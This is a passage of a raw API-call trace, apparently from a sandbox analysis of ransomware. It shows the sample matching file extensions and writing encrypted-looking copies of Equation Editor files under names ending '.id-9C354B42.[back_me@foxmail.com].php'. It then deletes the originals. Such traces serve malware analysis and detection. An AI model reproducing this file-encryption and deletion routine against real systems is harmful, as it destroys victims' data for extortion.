[0053.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.106] lstrlenW (lpString=".1cd") returned 4 [0053.106] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1 [0053.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.106] lstrlenW (lpString=".jpg") returned 4 [0053.106] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1 [0053.106] lstrcmpiW (lpString1=".EXE", lpString2=".php") returned -1 [0053.106] lstrlenW (lpString="EQNEDT32.EXE") returned 12 [0053.106] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.107] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=543304) returned 1 [0053.107] CloseHandle (hObject=0x1b4) returned 1 [0053.107] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 0x20 [0053.107] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.107] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.107] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.107] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.107] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.108] GetLastError () returned 0x0 [0053.108] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x84a48, lpOverlapped=0x0) returned 1 [0053.242] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x84a50, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x84a50, lpOverlapped=0x0) returned 1 [0053.253] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.253] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.253] SetEndOfFile (hFile=0x1a8) returned 1 [0053.254] CloseHandle (hObject=0x1a8) returned 1 [0053.254] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.254] SetEndOfFile (hFile=0x1b4) returned 1 [0053.259] CloseHandle (hObject=0x1b4) returned 1 [0053.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.259] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 1 [0053.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.259] lstrlenW (lpString=".doc") returned 4 [0053.259] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0053.259] lstrlenW (lpString=".docx") returned 5 [0053.259] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1 [0053.259] lstrlenW (lpString=".pdf") returned 4 [0053.259] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0053.259] lstrlenW (lpString=".xls") returned 4 [0053.260] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0053.260] lstrlenW (lpString=".xlsx") returned 5 [0053.260] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1 [0053.260] lstrlenW (lpString=".ppt") returned 4 [0053.260] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0053.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.260] lstrlenW (lpString=".zip") returned 4 [0053.260] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0053.260] lstrlenW (lpString=".rar") returned 4 [0053.260] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0053.260] lstrlenW (lpString=".bz2") returned 4 [0053.260] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0053.260] lstrlenW (lpString=".7z") returned 3 [0053.260] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0053.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.260] lstrlenW (lpString=".dbf") returned 4 [0053.260] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0053.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.261] lstrlenW (lpString=".1cd") returned 4 [0053.261] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0053.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.261] lstrlenW (lpString=".jpg") returned 4 [0053.261] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0053.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.261] lstrlenW (lpString=".doc") returned 4 [0053.261] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0053.261] lstrlenW (lpString=".docx") returned 5 [0053.261] lstrcmpiW (lpString1=".docx", lpString2="2.EXE") returned -1 [0053.261] lstrlenW (lpString=".pdf") returned 4 [0053.261] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0053.261] lstrlenW (lpString=".xls") returned 4 [0053.261] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0053.261] lstrlenW (lpString=".xlsx") returned 5 [0053.261] lstrcmpiW (lpString1=".xlsx", lpString2="2.EXE") returned -1 [0053.261] lstrlenW (lpString=".ppt") returned 4 [0053.261] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0053.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.261] lstrlenW (lpString=".zip") returned 4 [0053.261] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0053.261] lstrlenW (lpString=".rar") returned 4 [0053.261] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0053.261] lstrlenW (lpString=".bz2") returned 4 [0053.261] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0053.261] lstrlenW (lpString=".7z") returned 3 [0053.261] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0053.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.262] lstrlenW (lpString=".dbf") returned 4 [0053.262] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0053.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.262] lstrlenW (lpString=".1cd") returned 4 [0053.262] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0053.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 68 [0053.262] lstrlenW (lpString=".jpg") returned 4 [0053.262] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0053.262] lstrcmpiW (lpString1=".manifest", lpString2=".php") returned -1 [0053.262] lstrlenW (lpString="eqnedt32.exe.manifest") returned 21 [0053.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.262] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=566) returned 1 [0053.263] CloseHandle (hObject=0x1b4) returned 1 [0053.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 0x20 [0053.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.263] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.263] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.263] GetLastError () returned 0x0 [0053.263] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x236, lpOverlapped=0x0) returned 1 [0053.264] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x240, lpOverlapped=0x0) returned 1 [0053.266] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.266] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xfe, lpOverlapped=0x0) returned 1 [0053.266] SetEndOfFile (hFile=0x1a8) returned 1 [0053.266] CloseHandle (hObject=0x1a8) returned 1 [0053.266] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.266] SetEndOfFile (hFile=0x1b4) returned 1 [0053.267] CloseHandle (hObject=0x1b4) returned 1 [0053.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.267] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest")) returned 1 [0053.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.267] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.267] lstrlenW (lpString=".doc") returned 4 [0053.267] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0053.267] lstrlenW (lpString=".docx") returned 5 [0053.267] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0053.267] lstrlenW (lpString=".pdf") returned 4 [0053.267] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0053.267] lstrlenW (lpString=".xls") returned 4 [0053.268] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0053.268] lstrlenW (lpString=".xlsx") returned 5 [0053.268] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0053.268] lstrlenW (lpString=".ppt") returned 4 [0053.268] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0053.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.268] lstrlenW (lpString=".zip") returned 4 [0053.268] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0053.268] lstrlenW (lpString=".rar") returned 4 [0053.268] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0053.268] lstrlenW (lpString=".bz2") returned 4 [0053.268] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0053.268] lstrlenW (lpString=".7z") returned 3 [0053.268] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0053.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.268] lstrlenW (lpString=".dbf") returned 4 [0053.268] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0053.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.268] lstrlenW (lpString=".1cd") returned 4 [0053.268] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0053.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.268] lstrlenW (lpString=".jpg") returned 4 [0053.268] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0053.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.268] lstrlenW (lpString=".doc") returned 4 [0053.268] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0053.268] lstrlenW (lpString=".docx") returned 5 [0053.268] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0053.268] lstrlenW (lpString=".pdf") returned 4 [0053.269] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0053.269] lstrlenW (lpString=".xls") returned 4 [0053.269] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0053.269] lstrlenW (lpString=".xlsx") returned 5 [0053.269] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0053.269] lstrlenW (lpString=".ppt") returned 4 [0053.269] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0053.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.269] lstrlenW (lpString=".zip") returned 4 [0053.269] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0053.269] lstrlenW (lpString=".rar") returned 4 [0053.269] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0053.269] lstrlenW (lpString=".bz2") returned 4 [0053.269] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0053.269] lstrlenW (lpString=".7z") returned 3 [0053.269] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0053.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.269] lstrlenW (lpString=".dbf") returned 4 [0053.269] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0053.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.269] lstrlenW (lpString=".1cd") returned 4 [0053.269] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0053.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 77 [0053.269] lstrlenW (lpString=".jpg") returned 4 [0053.269] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0053.269] lstrcmpiW (lpString1=".HLP", lpString2=".php") returned -1 [0053.269] lstrlenW (lpString="EQNEDT32.HLP") returned 12 [0053.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.270] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=176311) returned 1 [0053.270] CloseHandle (hObject=0x1b4) returned 1 [0053.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 0x20 [0053.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.270] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.270] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.271] GetLastError () returned 0x0 [0053.271] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x2b0b7, lpOverlapped=0x0) returned 1 [0053.608] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x2b0c0, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x2b0c0, lpOverlapped=0x0) returned 1 [0053.612] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.612] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.612] SetEndOfFile (hFile=0x1a8) returned 1 [0053.612] CloseHandle (hObject=0x1a8) returned 1 [0053.612] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.612] SetEndOfFile (hFile=0x1b4) returned 1 [0053.614] CloseHandle (hObject=0x1b4) returned 1 [0053.614] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.614] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 1 [0053.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.614] lstrlenW (lpString=".doc") returned 4 [0053.614] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0053.614] lstrlenW (lpString=".docx") returned 5 [0053.614] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1 [0053.614] lstrlenW (lpString=".pdf") returned 4 [0053.614] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0053.615] lstrlenW (lpString=".xls") returned 4 [0053.615] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0053.615] lstrlenW (lpString=".xlsx") returned 5 [0053.615] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1 [0053.615] lstrlenW (lpString=".ppt") returned 4 [0053.615] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0053.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.615] lstrlenW (lpString=".zip") returned 4 [0053.615] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0053.615] lstrlenW (lpString=".rar") returned 4 [0053.615] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0053.615] lstrlenW (lpString=".bz2") returned 4 [0053.615] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0053.615] lstrlenW (lpString=".7z") returned 3 [0053.615] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0053.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.615] lstrlenW (lpString=".dbf") returned 4 [0053.615] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0053.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.615] lstrlenW (lpString=".1cd") returned 4 [0053.615] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0053.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.615] lstrlenW (lpString=".jpg") returned 4 [0053.615] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0053.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.615] lstrlenW (lpString=".doc") returned 4 [0053.615] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0053.615] lstrlenW (lpString=".docx") returned 5 [0053.615] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1 [0053.615] lstrlenW (lpString=".pdf") returned 4 [0053.616] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0053.616] lstrlenW (lpString=".xls") returned 4 [0053.616] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0053.616] lstrlenW (lpString=".xlsx") returned 5 [0053.616] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1 [0053.616] lstrlenW (lpString=".ppt") returned 4 [0053.616] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0053.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.616] lstrlenW (lpString=".zip") returned 4 [0053.616] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0053.616] lstrlenW (lpString=".rar") returned 4 [0053.616] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0053.616] lstrlenW (lpString=".bz2") returned 4 [0053.616] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0053.616] lstrlenW (lpString=".7z") returned 3 [0053.616] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0053.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.616] lstrlenW (lpString=".dbf") returned 4 [0053.616] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0053.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.616] lstrlenW (lpString=".1cd") returned 4 [0053.616] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0053.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0053.616] lstrlenW (lpString=".jpg") returned 4 [0053.616] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0053.616] lstrcmpiW (lpString1=".TTF", lpString2=".php") returned 1 [0053.616] lstrlenW 